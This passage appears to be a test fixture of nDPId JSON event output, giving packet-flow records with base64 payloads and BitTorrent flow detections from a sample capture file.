-00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1455469971321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469971321,"pkt":"LFbcjDU0xCwDBkn+CABFAAB48HJAAEAGAADAqAEDxmSSCc6n6wMx0mzN3F5zZYAYZooahAAAAQEIChnb\/+QB8nE1E0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjuG56+SlFtqa9S4="} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971321,"flow_last_seen":1455469971321,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971321,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1455469971481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1455469971481,"pkt":"xCwDBkn+LFbcjDU0CABFAACcFzZAAHYG0wzGZJIJwKgBA+sDzqfcXnNlMdJtEYAYAQK5ewAAAQEICgHycUYZ2\/\/kE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wopccBVvnEHfGIYQAAADnFABkMTplaTBlNDppcHY0NDrGZJIJMTI6Y29tcGxldGU="} -01316{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1455469971641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":601,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":601,"pkt_l4_len":567,"thread_ts_msec":1455469971641,"pkt":"xCwDBkn+LFbcjDU0CABFAAJLGqBAAHYGzfPGZJIJwKgBA+sDzqfcXnPNMdJtEYAYAQJeTwAAAQEICgHycVYZ3ACEX2Fnb2kyZTE6bWQxMTp1cGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNjAxNjNlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTAzZTY6eW91cmlwNDpSN80BZQAAAHQF\/\/\/\/\/\/\/f9\/\/\/\/37\/\/7\/\/\/\/\/\/\/3r\/\/\/\/3+\/\/7\/\/\/\/3\/\/9\/\/\/\/\/\/\/\/\/\/\/37\/7\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f\/\/\/f\/\/\/\/\/v\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/9\/\/\/gAAAAAUEAAAClAAAAAUEAAAAnQAAAAUEAAAAVwAAAAUEAAACuQAAAAUEAAAAUAAAAAUEAAAA8gAAAAUEAAAB4QAAAAUEAAADfAAAAAUEAAABUwAAAAUEAAAAKgAAAAUEAAAANAAAAAUEAAABXwAAAAUEAAAAaQAAAAUEAAAAmAAAAAUEAAACfAAAAAUEAAADWQAAAAUEAAABTAAAAAUEAAABBgAAAAUEAAABegAAAAUEAAAA1QAAAAUEAAAAxQAAAAUEAAAAvAAAAAUEAAAAnwAAAAUEAAAC6Q=="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971675,"flow_last_seen":1455469971675,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971675,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1455469971675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469971675,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4IXFAAEAGAADAqAEDvmfDOM6mtimT1S+nN0acgIAY\/\/9DtgAAAQEIChncAUQAv2TsE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjkGjzZtimXS5YKE="} -00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971675,"flow_last_seen":1455469971675,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971675,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1455469972136,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469972136,"pkt":"xCwDBkn+LFbcjDU0CABFAACrWLRAAHIGbE2+Z8M4wKgBA7YpzqY3RpyAk9Uv64AYAQLhNwAAAQEICgC\/ZvwZ3AFEE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLUJUNzk1MC3xopUl3euuGS1IpvoAAAEBFABkMTplaTBlNDppcHY0NDq+Z8M4NDppcHY2MTY6IAEAAF71efs4aCApQZg8xzE="} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1455469973108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1455469973108,"pkt":"LFbcjDU0xCwDBkn+CABFAADJDUpAAEAGAADAqAEDvmfDOM6mtimT1TBDN0ac94AZ\/\/9EBwAAAQEIChncBtUAv2b8M2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTI6dXRfcmVjb21tZW5kaTVlMTA6dXRfY29tbWVudGk2ZWUxOnBpNDA5NTllNDpyZXFxaTI1NWUxOnYxOTrCtVRvcnJlbnQgTWFjIDEuOC42Njp5b3VyaXA0Or5nwzhlAAAAAQ8="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974358,"flow_last_seen":1455469974358,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974358,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1455469974358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469974358,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4DCdAAEAGAADAqAEDUjrYc86rlaExvR02+FTOIoAY\/\/\/swwAAAQEIChncC64AhEXwE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjk6UZQGZj8psqfs="} -00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974358,"flow_last_seen":1455469974358,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974358,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974533,"flow_last_seen":1455469974533,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974533,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1455469974533,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469974533,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4WuVAAEAGAADAqAEDUjlhU86qz5GeFCpM34MiOYAY0pJ1ogAAAQEIChncDF0AFHySE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjjDhVI8cWXj55ew="} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974533,"flow_last_seen":1455469974533,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974533,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1455469974879,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469974879,"pkt":"xCwDBkn+LFbcjDU0CABFAACrC6JAAHcGgnNSOWFTwKgBA8+RzqrfgyI5nhQqkIAYAQJ8JwAAAQEICgAUfLUZ3AxdE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wosdxOntFzioIvnoAAADnFABkMTplaTBlNDppcHY0NDpSOWFTMTI6Y29tcGxldGVfYWdvaTBlMTptZDExOnU="} -01301{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1455469974888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":586,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":586,"pkt_l4_len":552,"thread_ts_msec":1455469974888,"pkt":"xCwDBkn+LFbcjDU0CABFAAI8C6RAAHcGgOBSOWFTwKgBA8+RzqrfgyKwnhQqkIAZAQKTPAAAAQEICgAUfLYZ3AxdcGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNTMxMzdlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTA2ZTY6eW91cmlwNDpSN80BZQAAAHQF\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/+\/\/\/\/\/\/\/\/\/r\/\/\/\/\/\/\/\/\/\/9\/\/P\/v\/\/\/\/\/+\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/ff\/\/\/3\/f\/\/\/\/\/\/\/\/\/\/7\/\/\/\/+\/\/\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/t\/u\/\/\/\/\/\/\/\/\/gAAAAAUEAAABGAAAAAUEAAACxAAAAAUEAAAAmwAAAAUEAAAB\/wAAAAUEAAABMwAAAAUEAAABJgAAAAUEAAABZAAAAAUEAAACOgAAAAUEAAAA1QAAAAUEAAACEAAAAAUEAAACFgAAAAUEAAADTAAAAAUEAAABWwAAAAUEAAACMAAAAAUEAAADPQAAAAUEAAADSQAAAAUEAAACnwAAAAUEAAAAeQAAAAUEAAAABgAAAAUEAAAA0wAAAAUEAAABJwAAAAUEAAACfwAAAAUEAAADVQAAAAUEAAADWQ=="} -01456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1455469975129,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":705,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":705,"pkt_l4_len":671,"thread_ts_msec":1455469975129,"pkt":"xCwDBkn+LFbcjDU0CABFAAKzM7RAAHUG4zdSOthzwKgBA5Whzqv4VM4iMb0deoAY\/SAeWQAAAQEICgCERjQZ3AuuE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3woo6KDyQqidsX6OsAAADnFABkMTplaTBlNDppcHY0NDpSOthzMTI6Y29tcGxldGVfYWdvaTFlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGkzODMwNWU0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI5MDdlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/e\/\/\/\/\/9\/\/\/\/\/v\/\/2\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/7\/f\/+\/\/\/\/\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/7\/\/\/\/7+\/+\/\/\/+\/\/\/\/\/v\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/8\/\/\/\/\/\/\/f\/\/\/\/3\/\/\/\/\/\/\/\/+AAAAABQQAAAI1AAAABQQAAAEuAAAABQQAAABqAAAABQQAAAE\/AAAABQQAAABtAAAABQQAAAKkAAAABQQAAAElAAAABQQAAAL5AAAABQQAAANYAAAABQQAAAA2AAAABQQAAAIPAAAABQQAAAJBAAAABQQAAAAOAAAABQQAAAMMAAAABQQAAAJ5AAAABQQAAAF6AAAABQQAAAJZAAAABQQAAAATAAAABQQAAAM4AAAABQQAAAItAAAABQQAAAHdAAAABQQAAAEPAAAABQQAAAMNAAAABQQAAABX"} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975234,"flow_last_seen":1455469975234,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975234,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1455469975234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975234,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4WJNAAEAGAADAqAEDlxpfHs6vWJEERbWJ8qKonIAYJJ+4TgAAAQEIChncDxURKgrLE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjhul1XASmRgFxRA="} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975234,"flow_last_seen":1455469975234,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975234,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975240,"flow_last_seen":1455469975240,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975240,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1455469975240,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975240,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4VgZAAEAGAADAqAEDl0j\/o86w6hjbuZSz\/XvqFoAYKEhZAgAAAQEIChncDxoAaM\/9E0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjpHIptJ+s3GSLpo="} -00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975240,"flow_last_seen":1455469975240,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975240,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975265,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1455469975265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975265,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4dKFAAEAGAADAqAEDTzXkAs6tOSO1PcfcBOlxsoAYN4r1TQAAAQEIChncDzIAAH\/nE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjpuHBUmeY0dBAis="} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975265,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00596{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1455469975295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":157,"pkt_l4_len":123,"thread_ts_msec":1455469975295,"pkt":"xCwDBkn+LFbcjDU0CABFAACPKABAAHIGh9GXSP+jwKgBA+oYzrD9e+oW27mU94AYAQF3EQAAAQEICgBo0AMZ3A8aE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wopW+kcQUcjSA5QoAAADnFABkMTplaTBlNDppcHY0NDqXSA=="} -00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1455469975314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1455469975314,"pkt":"xCwDBkn+LFbcjDU0CABFAACdCeVAAHIGRpKXGl8ewKgBA1iRzq\/yoqicBEW1zYAYHVwArAAAAQEIChEqCxYZ3A8VE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC2coV7lk33H8ZRraqcAAADnFABkMTplaTBlNDppcHY0NDqXGl8eMTI6Y29tcGxldGVf"} -00991{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1455469975341,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":449,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":449,"pkt_l4_len":415,"thread_ts_msec":1455469975341,"pkt":"LFbcjDU0xCwDBkn+CABFAAGz+chAAEAGAADAqAEDUjrYc86rlaExvR16+FTQoYAY\/\/\/t\/gAAAQEIChncD3wAhEZHAAAA+hQAZDE6ZWkwZTQ6aXB2NDQ6UjfNATQ6aXB2NjE2Ov6AAAAAAAAAxiwD\/\/4GSf4xMjpjb21wbGV0ZV9hZ29pMWUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTI6dXRfcmVjb21tZW5kaTVlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGk0MDk1OWU0OnJlcXFpMjU1ZTE6djE5OsK1VG9ycmVudCBNYWMgMS44LjY2OnlvdXJpcDQ6UjrYc2UAAAABDwAAAAMJn\/8AAAADFAMAAAAAAQIAAABlFAZkODptc2dfdHlwZWkwZTM6bnVtaTIwZTY6ZmlsdGVyNjQ6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGU="} 